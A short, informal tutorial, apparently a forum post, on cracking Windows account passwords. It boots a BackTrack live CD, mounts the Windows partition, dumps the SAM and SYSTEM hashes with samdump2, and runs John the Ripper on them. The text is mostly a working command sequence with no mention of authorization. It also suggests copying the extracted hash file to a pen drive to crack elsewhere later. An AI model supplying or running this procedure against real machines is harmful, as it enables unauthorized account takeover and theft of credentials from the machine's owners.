Windows Password Cracking

Now i’m gonna explain how to crack an windows password… it’s easy but isn’t fast xD

  1. Boot up your Back|Track 4 Live CD
  2. Open Konsole

Code:

mkdir /mnt/sda1
mount -t ntfs /dev/sda1 /mnt/sda1
cd /mnt/sda1/Windows/System32/config
samdump2 SYSTEM SAM > /root/list
cat /root/list | grep [username] > /root/userpassword
cd /pentest/passwords/jtr
./john -f:NT /root/userpassword

Note: for the code “cat /root/list | grep [username] > /root/userpassword” here is an example “cat /root/list | grep hitman.pt > /root/userpassword”
Now this will take a while depending how complex the password is…

Idea… if you don’t have enought time to crack the password I sugest you to copy “userpassword” file to a Pen Drive and crack it in home…
